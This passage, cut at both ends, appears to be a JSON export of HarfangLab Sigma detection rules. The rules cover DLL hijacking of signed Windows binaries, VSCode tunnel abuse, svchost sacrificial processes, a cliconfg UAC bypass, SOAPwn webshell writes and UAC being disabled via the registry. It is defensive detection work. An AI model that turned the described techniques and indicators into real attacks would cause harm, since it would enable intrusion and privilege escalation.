Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootcfg.exe'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16e0ffc8-8668-4969-8fe3-840080ccc099", "rule_name": "DLL Hijacking via bootcfg.exe", "rule_description": "Detects potential Windows DLL Hijacking via bootcfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "171739c5-ffb8-48b2-8e6d-e688af5f311b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587540Z", "creation_date": "2026-03-23T11:45:34.587544Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587552Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_msinfo32.yml", "content": "title: DLL Hijacking via msinfo32.exe\nid: 171739c5-ffb8-48b2-8e6d-e688af5f311b\ndescription: |\n Detects potential Windows DLL Hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\fastprox.dll'\n - '\\mfc42u.dll'\n - '\\powrprof.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "171739c5-ffb8-48b2-8e6d-e688af5f311b", "rule_name": "DLL Hijacking via msinfo32.exe", "rule_description": "Detects potential Windows DLL Hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "17d344bd-5969-438e-b896-775f30a96618", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.603629Z", "creation_date": "2026-03-23T11:45:34.603632Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.603639Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/", "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://code.visualstudio.com/docs/remote/tunnels", "https://attack.mitre.org/techniques/T1572/", "https://attack.mitre.org/techniques/T1090/", "https://attack.mitre.org/techniques/T1567/" ], "name": "t1090_vs_code_tunnel_commandline.yml", "content": "title: VSCode Proxy Tunnel Started via Command-line (Windows)\nid: 17d344bd-5969-438e-b896-775f30a96618\ndescription: |\n This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\n Since July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n CommandLine|contains: ' tunnel'\n\n selection_image:\n Image|endswith:\n - '\\code.exe'\n - '\\codium.exe'\n Signed: 'true'\n\n selection_peinfo:\n OriginalFileName: 'electron.exe'\n Description: 'Visual Studio Code'\n\n condition: selection_cmd and (selection_image or selection_peinfo)\nlevel: high\n#level: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "17d344bd-5969-438e-b896-775f30a96618", "rule_name": "VSCode Proxy Tunnel Started via Command-line (Windows)", "rule_description": "This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\nSince July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n", "rule_creation_date": "2023-09-25", "rule_modified_date": "2025-03-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1090", "attack.t1567", "attack.t1572" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "18048693-66e0-4701-b874-e81772fd4433", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627316Z", "creation_date": "2026-03-23T11:45:34.627318Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627323Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1055_sacrificial_process_svchost.yml", "content": "title: Svchost.exe Sacrificial Process Spawned\nid: 18048693-66e0-4701-b874-e81772fd4433\ndescription: |\n Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for example, by Cobalt Strike.\n It is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\system32\\svchost.exe'\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n filter_computrace:\n ParentImage:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "18048693-66e0-4701-b874-e81772fd4433", "rule_name": "Svchost.exe Sacrificial Process Spawned", "rule_description": "Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for example, by Cobalt Strike.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\n", "rule_creation_date": "2024-03-29", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1827b106-4555-4cda-9f03-7095766f3505", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074260Z", "creation_date": "2026-03-23T11:45:34.074262Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074267Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.greyhathacker.net/?p=796", "https://attack.mitre.org/techniques/T1548/002/" ], "name": "t1548_002_post_uac_bypass_cliconfg.yml", "content": "title: UAC Bypass Executed via cliconfg\nid: 1827b106-4555-4cda-9f03-7095766f3505\ndescription: |\n Detects a process being spawned by cliconfg.exe.\n Cliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/11/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\cliconfg.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1827b106-4555-4cda-9f03-7095766f3505", "rule_name": "UAC Bypass Executed via cliconfg", "rule_description": "Detects a process being spawned by cliconfg.exe.\nCliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n", "rule_creation_date": "2020-11-17", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "18606208-5435-42c6-b17a-7b5ceacc248e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618797Z", "creation_date": "2026-03-23T11:45:34.618799Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618804Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html", "https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_fontsets.yml", "content": "title: DLL Hijacking via FontSets.exe\nid: 18606208-5435-42c6-b17a-7b5ceacc248e\ndescription: |\n Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ttfman.exe'\n ImageLoaded|endswith: '\\FaultRep.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'A. & M. Neuber Software'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "18606208-5435-42c6-b17a-7b5ceacc248e", "rule_name": "DLL Hijacking via FontSets.exe", "rule_description": "Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2024-03-20", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1878e97a-df8d-4dd8-82f0-e84edc867171", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623606Z", "creation_date": "2026-03-23T11:45:34.623608Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623612Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1", "https://attack.mitre.org/techniques/T1190/" ], "name": "t1190_soapwn.yml", "content": "title: IIS SOAPwn Vulnerability Exploited\nid: 1878e97a-df8d-4dd8-82f0-e84edc867171\ndescription: |\n Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\n Vulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\n It is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\nreferences:\n - https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/12\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'write'\n ProcessImage|endswith:\n - '\\w3wp.exe'\n - '\\iisexpress.exe'\n - '\\dotnet.exe'\n FirstBytes|startswith: '3c3f786d6c20'\n Path|endswith:\n - '.cshtml'\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1878e97a-df8d-4dd8-82f0-e84edc867171", "rule_name": "IIS SOAPwn Vulnerability Exploited", "rule_description": "Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\nVulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\nIt is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\n", "rule_creation_date": "2025-12-12", "rule_modified_date": "2026-01-27", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.initial_access", "attack.persistence" ], "rule_technique_tags": [ "attack.t1190", "attack.t1505.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "189eeb83-5aec-4186-97ea-ad22929a4f15", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.610304Z", "creation_date": "2026-03-23T11:45:34.610308Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.610315Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration", "https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d", "https://attack.mitre.org/techniques/T1548/" ], "name": "t1548_uac_consent_config_disabled_manually.yml", "content": "title: UAC Registry Configuration Disabled Manually\nid: 189eeb83-5aec-4186-97ea-ad22929a4f15\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/10/23\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n Details: 'DWORD (0x00000000)'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "189eeb83-5aec-4186-97ea-ad22929a4f15", "rule_name": "UAC Registry Configuration Disabled Manually", "rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\n", "rule_creation_date": "2024-10-23", "rule_modified_date": "2025-10-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "18ae8604-550e-4ae2-a46b-dd87ad258288", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.602362Z", "creation_date": "2026-03-23T11:45:34.602366Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.602373Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_ehstorauthn.yml", "content": "title: DLL Hijacking via ehstorauthn.exe\nid: 18ae8604-550e-4ae2-a46b-dd87ad258288\ndescription: |\n Detects potential Windows DLL Hijacking via ehstorauthn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ehstorauthn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n 